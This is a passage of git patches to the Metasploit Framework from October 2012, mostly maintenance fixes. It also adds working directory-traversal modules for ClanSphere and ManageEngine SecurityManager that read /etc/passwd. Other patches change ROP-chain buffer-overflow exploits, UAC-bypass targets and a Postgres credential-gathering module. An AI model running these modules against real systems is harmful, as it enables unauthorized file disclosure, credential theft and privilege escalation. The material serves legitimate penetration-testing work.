standard methods defined by rfc2616, default: GET # - proto: protocol, default: HTTP @@ -208,28 +209,28 @@ class Client # - vhost: Host header value # def request_cgi(opts={}) - c_enc = opts['encode'] || false - c_cgi = opts['uri'] || '/' - c_body = opts['data'] || '' - c_meth = opts['method'] || 'GET' - c_prot = opts['proto'] || 'HTTP' - c_vers = opts['version'] || config['version'] || '1.1' - c_qs = opts['query'] || '' - c_varg = opts['vars_get'] || {} - c_varp = opts['vars_post'] || {} - c_head = opts['headers'] || config['headers'] || {} - c_rawh = opts['raw_headers']|| config['raw_headers'] || '' - c_type = opts['ctype'] || 'application/x-www-form-urlencoded' - c_ag = opts['agent'] || config['agent'] - c_cook = opts['cookie'] || config['cookie'] - c_host = opts['vhost'] || config['vhost'] - c_conn = opts['connection'] - c_path = opts['path_info'] - c_auth = opts['basic_auth'] || config['basic_auth'] || '' - - uri = set_cgi(c_cgi) - qstr = c_qs - pstr = c_body + c_enc = opts['encode'] || false + c_enc_p = (opts['encode_params'] == true or opts['encode_params'].nil? ? true : false) + c_cgi = opts['uri'] || '/' + c_body = opts['data'] || '' + c_meth = opts['method'] || 'GET' + c_prot = opts['proto'] || 'HTTP' + c_vers = opts['version'] || config['version'] || '1.1' + c_qs = opts['query'] || '' + c_varg = opts['vars_get'] || {} + c_varp = opts['vars_post'] || {} + c_head = opts['headers'] || config['headers'] || {} + c_rawh = opts['raw_headers'] || config['raw_headers'] || '' + c_type = opts['ctype'] || 'application/x-www-form-urlencoded' + c_ag = opts['agent'] || config['agent'] + c_cook = opts['cookie'] || config['cookie'] + c_host = opts['vhost'] || config['vhost'] + c_conn = opts['connection'] + c_path = opts['path_info'] + c_auth = opts['basic_auth'] || config['basic_auth'] || '' + uri = set_cgi(c_cgi) + qstr = c_qs + pstr = c_body if (config['pad_get_params']) 1.upto(config['pad_get_params_count'].to_i) do |i| @@ -242,25 +243,27 @@ class Client c_varg.each_pair do |var,val| qstr << '&' if qstr.length > 0 - qstr << set_encode_uri(var) + qstr << (c_enc_p ? set_encode_uri(var) : var) qstr << '=' - qstr << set_encode_uri(val) + qstr << (c_enc_p ? set_encode_uri(val) : val) end if (config['pad_post_params']) 1.upto(config['pad_post_params_count'].to_i) do |i| + rand_var = Rex::Text.rand_text_alphanumeric(rand(32)+1) + rand_val = Rex::Text.rand_text_alphanumeric(rand(32)+1) pstr << '&' if pstr.length > 0 - pstr << set_encode_uri(Rex::Text.rand_text_alphanumeric(rand(32)+1)) + pstr << (c_enc_p ? set_encode_uri(rand_var) : rand_var) pstr << '=' - pstr << set_encode_uri(Rex::Text.rand_text_alphanumeric(rand(32)+1)) + pstr << (c_enc_p ? set_encode_uri(rand_val) : rand_val) end end c_varp.each_pair do |var,val| pstr << '&' if pstr.length > 0 - pstr << set_encode_uri(var) + pstr << (c_enc_p ? set_encode_uri(var) : var) pstr << '=' - pstr << set_encode_uri(val) + pstr << (c_enc_p ? set_encode_uri(val) : val) end req = '' @@ -294,6 +297,7 @@ class Client req << set_chunked_header() req << set_raw_headers(c_rawh) req << set_body(pstr) + req end From 34731c3e0a103806a7ddba9e6cf1234bcfb68db5 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 29 Oct 2012 03:44:22 -0500 Subject: [PATCH 15/64] Add OSVDB-86720 - Clansphere dir traversarl --- .../scanner/http/clansphere_traversal.rb | 84 +++++++++++++++++++ 1 file changed, 84 insertions(+) create mode 100644 modules/auxiliary/scanner/http/clansphere_traversal.rb diff --git a/modules/auxiliary/scanner/http/clansphere_traversal.rb b/modules/auxiliary/scanner/http/clansphere_traversal.rb new file mode 100644 index 0000000000..186ef60177 --- /dev/null +++ b/modules/auxiliary/scanner/http/clansphere_traversal.rb @@ -0,0 +1,84 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'ClanSphere 2011.3 Local File Inclusion Vulnerability', + 'Description' => %q{ + This module exploits a directory traversal flaw found in Clansphere 2011.3. + The application fails to handle the cs_lang parameter properly, which can be + used to read any file outside the virtual directory. + }, + 'References' => + [ + ['OSVDB', '86720'], + ['EDB', '22181'] + ], + 'Author' => + [ + 'blkhtc0rp', #Original + 'sinn3r' + ], + 'License' => MSF_LICENSE, + 'DisclosureDate' => "Oct 23 2012" + )) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The URI path to the web application', '/clansphere_2011.3/']), + OptString.new('FILE', [true, 'The file to obtain', '/etc/passwd']), + OptInt.new('DEPTH', [true, 'The max traversal depth to root directory', 10]) + ], self.class) + end + + + def run_host(ip) + base = target_uri.path + base << '/' if base[-1,1] != '/' + + peer = "#{ip}:#{rport}" + + print_status("#{peer} - Reading '#{datastore['FILE']}'") + traverse = "../" * datastore['DEPTH'] + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => "#{base}index.php", + 'cookie' => "blah=blah; cs_lang=#{traverse}#{datastore['FILE']}%00.png" + }) + + if res and res.body =~ /^Fatal error\:/ + print_error("Either '#{datastore['FILE']}' does not exist, or no permission.") + + elsif res and res.code == 200 + pattern_end = " UTC +1 - Load:" + data = res.body.scan(/\
\n(.+)\n\x20{5}UTC.+/m).flatten[0].lstrip + fname = datastore['FILE'] + p = store_loot( + 'clansphere.cms', + 'application/octet-stream', + ip, + data, + fname + ) + + vprint_line(data) + print_good("#{peer} - #{fname} stored as '#{p}'") + + else + print_error("#{peer} - Fail to obtain file for some unknown reason") + end + end + +end From 2c4273e4780b1bcede21a631e2916e09bca96849 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 29 Oct 2012 04:41:30 -0500 Subject: [PATCH 16/64] Correct some modules with res nil --- modules/auxiliary/admin/officescan/tmlisten_traversal.rb | 5 +++++ modules/auxiliary/dos/http/sonicwall_ssl_format.rb | 2 +- modules/auxiliary/scanner/http/ektron_cms400net.rb | 2 +- .../auxiliary/scanner/http/sap_businessobjects_user_brute.rb | 4 ++-- .../scanner/http/sap_businessobjects_user_brute_web.rb | 2 +- .../auxiliary/scanner/http/sap_businessobjects_user_enum.rb | 4 ++-- modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb | 2 ++ modules/exploits/unix/webapp/dogfood_spell_exec.rb | 2 +- 8 files changed, 15 insertions(+), 8 deletions(-) diff --git a/modules/auxiliary/admin/officescan/tmlisten_traversal.rb b/modules/auxiliary/admin/officescan/tmlisten_traversal.rb index 46da0d97fd..edc05e66b0 100644 --- a/modules/auxiliary/admin/officescan/tmlisten_traversal.rb +++ b/modules/auxiliary/admin/officescan/tmlisten_traversal.rb @@ -51,6 +51,11 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET', }, 20) + if not res + print_error("No response from server") + return + end + http_fingerprint({ :response => res }) if (res.code >= 200) diff --git a/modules/auxiliary/dos/http/sonicwall_ssl_format.rb b/modules/auxiliary/dos/http/sonicwall_ssl_format.rb index 49d141a235..7cbe47c42a 100644 --- a/modules/auxiliary/dos/http/sonicwall_ssl_format.rb +++ b/modules/auxiliary/dos/http/sonicwall_ssl_format.rb @@ -58,7 +58,7 @@ class Metasploit3 < Msf::Auxiliary 'uri' => datastore['URI'] + fmt, }) - if res.code == 200 + if res and res.code == 200 res.body.scan(/\(.+)XX/ism) print_status("Information leaked: #{$1}") end diff --git a/modules/auxiliary/scanner/http/ektron_cms400net.rb b/modules/auxiliary/scanner/http/ektron_cms400net.rb index 9ed7d41267..4f9c0c22d1 100644 --- a/modules/auxiliary/scanner/http/ektron_cms400net.rb +++ b/modules/auxiliary/scanner/http/ektron_cms400net.rb @@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary #Check for HTTP 200 response. #Numerous versions and configs make if difficult to further fingerprint. - if (res.code == 200) + if (res and res.code == 200) print_status("Ektron CMS400.NET install found at #{target_url} [HTTP 200]") #Gather __VIEWSTATE and __EVENTVALIDATION from HTTP response. diff --git a/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb b/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb index 51accf67d5..526adfc1c5 100644 --- a/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb +++ b/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb @@ -89,8 +89,8 @@ class Metasploit3 < Msf::Auxiliary 'Content-Type' => 'text/xml; charset=UTF-8', } }, 45) - return :abort if (res.code == 404) - success = true if(res.body.match(/SessionInfo/i)) + return :abort if (!res or (res and res.code == 404)) + success = true if(res and res.body.match(/SessionInfo/i)) success rescue ::Rex::ConnectionError diff --git a/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb b/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb index e7c35ce747..37a9d4e42b 100644 --- a/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb +++ b/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Auxiliary 'Accept-Encoding' => "gzip,deflate", }, }, 45) - return :abort if (res.code != 200) + return :abort if (!res or (res and res.code != 200)) if(res.body.match(/Account Information/i)) success = false else diff --git a/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb b/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb index 3d97d8c46f..93bbc821c5 100644 --- a/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb +++ b/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb @@ -93,8 +93,8 @@ class Metasploit3 < Msf::Auxiliary }, 45) if res - return :abort if (res.code == 404) - success = true if(res.body.match(/Invalid password/i)) + return :abort if (!res or (res and res.code == 404)) + success = true if(res and res.body.match(/Invalid password/i)) success else vprint_error("[SAP BusinessObjects] No response") diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb index d3972a086c..25fd8950e2 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb @@ -126,6 +126,8 @@ class Metasploit4 < Msf::Auxiliary } }, 45) + return if not res + if (res.code != 500 and res.code != 200) return else diff --git a/modules/exploits/unix/webapp/dogfood_spell_exec.rb b/modules/exploits/unix/webapp/dogfood_spell_exec.rb index 1f0d91ae35..abe79ede7d 100644 --- a/modules/exploits/unix/webapp/dogfood_spell_exec.rb +++ b/modules/exploits/unix/webapp/dogfood_spell_exec.rb @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => datastore['URIPATH'], }, 1) - if (res.body =~ /Spell Check complete/) + if (res and res.body =~ /Spell Check complete/) return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe From ac90d217259bc3aeb91e4029b126a2b268c67230 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 29 Oct 2012 08:27:22 -0500 Subject: [PATCH 17/64] Msftidy checks for file loads --- tools/msftidy.rb | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/tools/msftidy.rb b/tools/msftidy.rb index cdcf95aea8..505fb15855 100755 --- a/tools/msftidy.rb +++ b/tools/msftidy.rb @@ -208,6 +208,11 @@ class Msftidy end end + # if ln =~/^[ \t]+load[ \t]+.*?\.rb/ + if ln =~/^[ \t]*load[ \t]+[\x22\x27]/ + error("Loading (not requiring) a file: #{ln.inspect}", idx) + end + # The rest of these only count if it's not a comment line next if ln =~ /[[:space:]]*#/ From bd0352de1993b339ad9c6aeccf730ed5817c773a Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 29 Oct 2012 08:33:01 -0500 Subject: [PATCH 18/64] Delete comment --- tools/msftidy.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/tools/msftidy.rb b/tools/msftidy.rb index 505fb15855..e630ea2c8b 100755 --- a/tools/msftidy.rb +++ b/tools/msftidy.rb @@ -208,7 +208,6 @@ class Msftidy end end - # if ln =~/^[ \t]+load[ \t]+.*?\.rb/ if ln =~/^[ \t]*load[ \t]+[\x22\x27]/ error("Loading (not requiring) a file: #{ln.inspect}", idx) end From 0e3bc7d060d405766274ef30ba77bac223fc4b72 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 29 Oct 2012 15:45:40 +0100 Subject: [PATCH 19/64] hp operations agent mods: fix use of pattern_create, use ropdb --- .../misc/hp_operations_agent_coda_34.rb | 36 +++---------------- .../misc/hp_operations_agent_coda_8c.rb | 36 +++---------------- 2 files changed, 10 insertions(+), 62 deletions(-) diff --git a/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb b/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb index f87c4615e9..b0bbfffef4 100644 --- a/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb +++ b/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb @@ -12,6 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::Seh + include Msf::Exploit::RopDb def initialize super( @@ -182,37 +183,10 @@ user-agent: BBC 11.00.044; 14 bof << payload.encoded bof << rand_text(4000) # Allows to trigger exception else # Windows 2003 - rop_gadgets = - [ - 0x77bb2563, # POP EAX # RETN - 0x77ba1114, # <- *&VirtualProtect() - 0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN - junk, - 0x77bb0c86, # XCHG EAX,ESI # RETN - 0x77bc9801, # POP EBP # RETN - 0x77be2265, # ptr to 'push esp # ret' - 0x77bb2563, # POP EAX # RETN - 0x03C0990F, - 0x77bdd441, # SUB EAX, 03c0940f (dwSize, 0x500 -> ebx) - 0x77bb48d3, # POP EBX, RET - 0x77bf21e0, # .data - 0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN - 0x77bbfc02, # POP ECX # RETN - 0x77bef001, # W pointer (lpOldProtect) (-> ecx) - 0x77bd8c04, # POP EDI # RETN - 0x77bd8c05, # ROP NOP (-> edi) - 0x77bb2563, # POP EAX # RETN - 0x03c0984f, - 0x77bdd441, # SUB EAX, 03c0940f - 0x77bb8285, # XCHG EAX,EDX # RETN - 0x77bb2563, # POP EAX # RETN - nop, - 0x77be6591, # PUSHAD # ADD AL,0EF # RETN - ].pack("V*") - bof = Rex::Text.pattern_create(target['RopOffset']) - bof << rop_gadgets - bof << payload.encoded - my_payload_length = target['RopOffset'] + rop_gadgets.length + payload.encoded.length + rop_payload = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'2003'}) + bof = rand_text(target['RopOffset']) + bof << rop_payload + my_payload_length = target['RopOffset'] + rop_payload.length bof << rand_text(target['Offset'] - my_payload_length) bof << generate_seh_record(target.ret) bof << rand_text(4000) # Allows to trigger exception diff --git a/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb b/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb index 152836b2e4..23160eb4e0 100644 --- a/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb +++ b/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb @@ -12,6 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::Seh + include Msf::Exploit::RopDb def initialize super( @@ -182,37 +183,10 @@ user-agent: BBC 11.00.044; 14 bof << payload.encoded bof << rand_text(4000) # Allows to trigger exception else # Windows 2003 - rop_gadgets = - [ - 0x77bb2563, # POP EAX # RETN - 0x77ba1114, # <- *&VirtualProtect() - 0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN - junk, - 0x77bb0c86, # XCHG EAX,ESI # RETN - 0x77bc9801, # POP EBP # RETN - 0x77be2265, # ptr to 'push esp # ret' - 0x77bb2563, # POP EAX # RETN - 0x03C0990F, - 0x77bdd441, # SUB EAX, 03c0940f (dwSize, 0x500 -> ebx) - 0x77bb48d3, # POP EBX, RET - 0x77bf21e0, # .data - 0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN - 0x77bbfc02, # POP ECX # RETN - 0x77bef001, # W pointer (lpOldProtect) (-> ecx) - 0x77bd8c04, # POP EDI # RETN - 0x77bd8c05, # ROP NOP (-> edi) - 0x77bb2563, # POP EAX # RETN - 0x03c0984f, - 0x77bdd441, # SUB EAX, 03c0940f - 0x77bb8285, # XCHG EAX,EDX # RETN - 0x77bb2563, # POP EAX # RETN - nop, - 0x77be6591, # PUSHAD # ADD AL,0EF # RETN - ].pack("V*") - bof = Rex::Text.pattern_create(target['RopOffset']) - bof << rop_gadgets - bof << payload.encoded - my_payload_length = target['RopOffset'] + rop_gadgets.length + payload.encoded.length + rop_payload = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'2003'}) + bof = rand_text(target['RopOffset']) + bof << rop_payload + my_payload_length = target['RopOffset'] + rop_payload.length bof << rand_text(target['Offset'] - my_payload_length) bof << generate_seh_record(target.ret) bof << rand_text(4000) # Allows to trigger exception From 5e80e19a4ec59f26f8d0c2c963a665b9b8d2e2f5 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 29 Oct 2012 11:08:03 -0500 Subject: [PATCH 20/64] Msftidy complaint about EOL spaces --- modules/post/multi/escalate/metasploit_pcaplog.rb | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb index 64cdea7f19..3ce5ff4189 100644 --- a/modules/post/multi/escalate/metasploit_pcaplog.rb +++ b/modules/post/multi/escalate/metasploit_pcaplog.rb @@ -42,7 +42,7 @@ class Metasploit3 < Msf::Post 'References' => [ [ 'BID', '54472' ], - [ 'URL', 'http://0a29.blogspot.com/2012/07/0a29-12-2-metasploit-pcaplog-plugin.html'], + [ 'URL', 'http://0a29.blogspot.com/2012/07/0a29-12-2-metasploit-pcaplog-plugin.html'], [ 'URL', 'https://community.rapid7.com/docs/DOC-1946' ], ], 'DisclosureDate' => "Jul 16 2012", @@ -55,7 +55,7 @@ class Metasploit3 < Msf::Post } )) register_options( - [ + [ Opt::RPORT(2940), OptString.new("USERNAME", [ true, "Username for the new superuser", "metasploit" ]), OptString.new("PASSWORD", [ true, "Password for the new superuser", "metasploit" ]), @@ -98,13 +98,13 @@ class Metasploit3 < Msf::Post i = (i+1) % 60 # increment second counter end - if cmd_exec("(grep Metasploit /etc/passwd > /dev/null && echo true) || echo false").include?("true") + if cmd_exec("(grep Metasploit /etc/passwd > /dev/null && echo true) || echo false").include?("true") print_good("Success. You should now be able to login or su to the '" + datastore['USERNAME'] + "' account") # TODO: Consider recording our now-created username and password as a valid credential here. else - print_error("Failed, the '" + datastore['USERNAME'] + "' user does not appear to have been added") - end + print_error("Failed, the '" + datastore['USERNAME'] + "' user does not appear to have been added") + end # 0a2940: Initially the plan was to have this post module switch user, upload & execute a new payload - # However beceause the session is not a terminal, su will not always allow this. + # However beceause the session is not a terminal, su will not always allow this. end end From 65e27ff38a614459b31fcacd7540c26aa06ec5da Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 29 Oct 2012 11:22:06 -0500 Subject: [PATCH 21/64] Warn about the potential to jack up /etc/passwd This needs to be underlined. It's too easy to wang up /etc/passwd by accident. This closes PR #632 [Fixes #38593685] --- modules/post/multi/escalate/metasploit_pcaplog.rb | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb index 3ce5ff4189..0e02a311e8 100644 --- a/modules/post/multi/escalate/metasploit_pcaplog.rb +++ b/modules/post/multi/escalate/metasploit_pcaplog.rb @@ -33,7 +33,9 @@ class Metasploit3 < Msf::Post Successful exploitation results in the creation of a new superuser account. - This module requires manual clean-up - remove /tmp/msf3-session*pcap files and truncate /etc/passwd. + This module requires manual clean-up. Upon success, you should remove /tmp/msf3-session*pcap + files and truncate /etc/passwd. Note that if this module fails, you can potentially induce + a permanent DoS on the target by corrupting the /etc/passwd file. }, 'License' => MSF_LICENSE, 'Author' => [ '0a29406d9794e4f9b30b3c5d6702c708'], From 2a202e9035b771cf8b07ad41f36209bd1e54b3d6 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 29 Oct 2012 12:23:48 -0500 Subject: [PATCH 22/64] Add OSVDB-86563 ManageEngine SecurityManager dir traversal --- .../manageengine_securitymanager_traversal.rb | 92 +++++++++++++++++++ 1 file changed, 92 insertions(+) create mode 100644 modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb diff --git a/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb b/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb new file mode 100644 index 0000000000..b716be0c79 --- /dev/null +++ b/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb @@ -0,0 +1,92 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'ManageEngine SecurityManager Plus 5.5 Directory Traversal', + 'Description' => %q{ + This module exploits a directory traversal flaw found in ManageEngine + SecurityManager Plus 5.5 or less. When handling a file download request, + the DownloadServlet class fails to properly check the 'f' parameter, which + can be abused to read any file outside the virtual directory. + }, + 'References' => + [ + ['OSVDB', '86563'], + ['EDB', '22092'] + ], + 'Author' => + [ + 'blkhtc0rp', #Original + 'sinn3r' + ], + 'License' => MSF_LICENSE, + 'DisclosureDate' => "Oct 19 2012" + )) + + register_options( + [ + OptPort.new('RPORT', [true, 'The target port', 6262]), + OptString.new('TARGETURI', [true, 'The URI path to the web application', '/']), + OptString.new('FILE', [true, 'The file to obtain', '/etc/passwd']), + OptInt.new('DEPTH', [true, 'The max traversal depth to root directory', 10]) + ], self.class) + end + + + def run_host(ip) + base = target_uri.path + base << '/' if base[-1,1] != '/' + + peer = "#{ip}:#{rport}" + fname = datastore['FILE'] + + print_status("#{peer} - Reading '#{datastore['FILE']}'") + traverse = "../" * datastore['DEPTH'] + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => "#{base}store", + 'vars_get' => { + 'f' => "#{traverse}#{datastore['FILE']}" + } + }) + + + if res and res.code == 500 and res.body =~ /Error report/ + print_error("Cannot obtain '#{fname}', here are some possible reasons:") + print_error("\t1. File does not exist.") + print_error("\t2. The server does not have any patches deployed.") + print_error("\t3. Your 'DEPTH' option isn't deep enough.") + print_error("\t4. Some kind of permission issues.") + + elsif res and res.code == 200 + data = res.body + p = store_loot( + 'manageengine.securitymanager', + 'application/octet-stream', + ip, + data, + fname + ) + + vprint_line(data) + print_good("#{peer} - #{fname} stored as '#{p}'") + + else + print_error("#{peer} - Fail to obtain file for some unknown reason") + end + end + +end \ No newline at end of file From c878b9077b3384cc03abb43bc2b4ed049a43eefa Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 29 Oct 2012 12:25:07 -0500 Subject: [PATCH 23/64] Rename the DeviceExpert module to avoid confusion --- ...engine_traversal.rb => manageengine_deviceexpert_traversal.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/auxiliary/scanner/http/{manageengine_traversal.rb => manageengine_deviceexpert_traversal.rb} (100%) diff --git a/modules/auxiliary/scanner/http/manageengine_traversal.rb b/modules/auxiliary/scanner/http/manageengine_deviceexpert_traversal.rb similarity index 100% rename from modules/auxiliary/scanner/http/manageengine_traversal.rb rename to modules/auxiliary/scanner/http/manageengine_deviceexpert_traversal.rb From 8c46c59142e895a46d620e4b6d57a8b087ac84b2 Mon Sep 17 00:00:00 2001 From: sagishahar Date: Mon, 29 Oct 2012 20:11:27 +0200 Subject: [PATCH 24/64] Add support to Windows 8 Verified with Windows 8 Enterprise Evaluation --- modules/post/windows/escalate/bypassuac.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/windows/escalate/bypassuac.rb b/modules/post/windows/escalate/bypassuac.rb index 7921f096b6..209f7c4d78 100644 --- a/modules/post/windows/escalate/bypassuac.rb +++ b/modules/post/windows/escalate/bypassuac.rb @@ -50,7 +50,7 @@ class Metasploit3 < Msf::Post vuln = false sysinfo = session.sys.config.sysinfo winver = sysinfo["OS"] - affected = [ 'Windows Vista', 'Windows 7', 'Windows 2008' ] + affected = [ 'Windows Vista', 'Windows 7', 'Windows 2008', 'Windows 8' ] affected.each { |v| if winver.include? v vuln = true From 53c7479d70377d05a17973e1e560ec49581a6a78 Mon Sep 17 00:00:00 2001 From: sagishahar Date: Mon, 29 Oct 2012 20:12:47 +0200 Subject: [PATCH 25/64] Add Windows 8 support Verified with Windows 8 Enterprise Evaluation --- modules/exploits/windows/local/bypassuac.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/local/bypassuac.rb b/modules/exploits/windows/local/bypassuac.rb index d02b18e05a..a0d30aac47 100644 --- a/modules/exploits/windows/local/bypassuac.rb +++ b/modules/exploits/windows/local/bypassuac.rb @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Local # vuln = false winver = sysinfo["OS"] - affected = [ 'Windows Vista', 'Windows 7', 'Windows 2008' ] + affected = [ 'Windows Vista', 'Windows 7', 'Windows 2008', 'Windows 8' ] affected.each { |v| if winver.include? v vuln = true From eda5e8a12f2960726f562b20cfbee0e3efe9b740 Mon Sep 17 00:00:00 2001 From: Zach Grace Date: Mon, 29 Oct 2012 14:23:50 -0500 Subject: [PATCH 26/64] Changed platform type from windows to win and fixed an indentation error. --- modules/post/multi/gather/pgpass_creds.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/post/multi/gather/pgpass_creds.rb b/modules/post/multi/gather/pgpass_creds.rb index 74ac36f48b..b997dc9519 100644 --- a/modules/post/multi/gather/pgpass_creds.rb +++ b/modules/post/multi/gather/pgpass_creds.rb @@ -10,7 +10,7 @@ class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Common include Msf::Post::Unix - include Msf::Post::Windows::UserProfiles + include Msf::Post::Windows::UserProfiles def initialize(info={}) super( update_info(info, @@ -22,7 +22,7 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => ['Zach Grace '], - 'Platform' => %w[linux bsd unix osx windows], + 'Platform' => %w[linux bsd unix osx win], 'SessionTypes' => %w[meterpreter shell] )) end From 5c27c9c953b7afdc7b19e91ba85afc47419bd4e6 Mon Sep 17 00:00:00 2001 From: Zach Grace Date: Mon, 29 Oct 2012 15:18:13 -0500 Subject: [PATCH 27/64] Added a print_good from the results of store_loot --- modules/post/multi/gather/pgpass_creds.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/post/multi/gather/pgpass_creds.rb b/modules/post/multi/gather/pgpass_creds.rb index b997dc9519..8604023432 100644 --- a/modules/post/multi/gather/pgpass_creds.rb +++ b/modules/post/multi/gather/pgpass_creds.rb @@ -59,7 +59,8 @@ class Metasploit3 < Msf::Post files.each do |f| # Store the loot print_good("Downloading #{f}") - store_loot("pgpass.#{f}", "text/plain", session, read_file(f), "#{f}", "pgpass #{f} File") + pgpass_path = store_loot("postgres.pgpass", "text/plain", session, read_file(f), "#{f}", "pgpass #{f} file") + print_good "Postgres credentials file saved to #{pgpass_path}" # Store the creds parse_creds(f) end From d0650dfb252282337183287bdd53e28e2acca583 Mon Sep 17 00:00:00 2001 From: James Lee Date: Mon, 29 Oct 2012 22:45:46 -0500 Subject: [PATCH 28/64] Put a bandaid over getsockname Depending on how a socket was created, #getsockname will return either a struct sockaddr as a String (the default ruby Socket behavior) or an Array (the extend'd Rex::Socket::Tcp behavior). Avoid the ambiguity when generating SSL certificates for meterpreter handlers by always picking a random hostname. This is by no means a proper fix for the underlying problem of Socket#getsockname having ambiguous behavior before and after being extended with Rex::Socket::Tcp. It does, however, solve the immediate problem of not being able to create tunneled meterpreter sessions over http(s) sessions. [SeeRM #7350] --- lib/msf/core/handler/bind_tcp.rb | 3 +-- lib/rex/io/stream_abstraction.rb | 3 +++ lib/rex/post/meterpreter/client.rb | 11 +++++++++-- 3 files changed, 13 insertions(+), 4 deletions(-) diff --git a/lib/msf/core/handler/bind_tcp.rb b/lib/msf/core/handler/bind_tcp.rb index 4122aa3592..297276288c 100644 --- a/lib/msf/core/handler/bind_tcp.rb +++ b/lib/msf/core/handler/bind_tcp.rb @@ -127,7 +127,7 @@ module BindTcp rescue Rex::ConnectionRefused # Connection refused is a-okay rescue ::Exception - wlog("Exception caught in bind handler: #{$!}") + wlog("Exception caught in bind handler: #{$!.class} #{$!}") end break if client @@ -138,7 +138,6 @@ module BindTcp # Valid client connection? if (client) - # Increment the has connection counter self.pending_connections += 1 diff --git a/lib/rex/io/stream_abstraction.rb b/lib/rex/io/stream_abstraction.rb index 6fed32d12f..6d40b21753 100644 --- a/lib/rex/io/stream_abstraction.rb +++ b/lib/rex/io/stream_abstraction.rb @@ -149,6 +149,9 @@ protected closed = true wlog("monitor_rsock: closed remote socket due to nil read") end + rescue EOFError => e + closed = true + dlog("monitor_rsock: EOF in rsock") rescue ::Exception => e closed = true wlog("monitor_rsock: exception during read: #{e.class} #{e}") diff --git 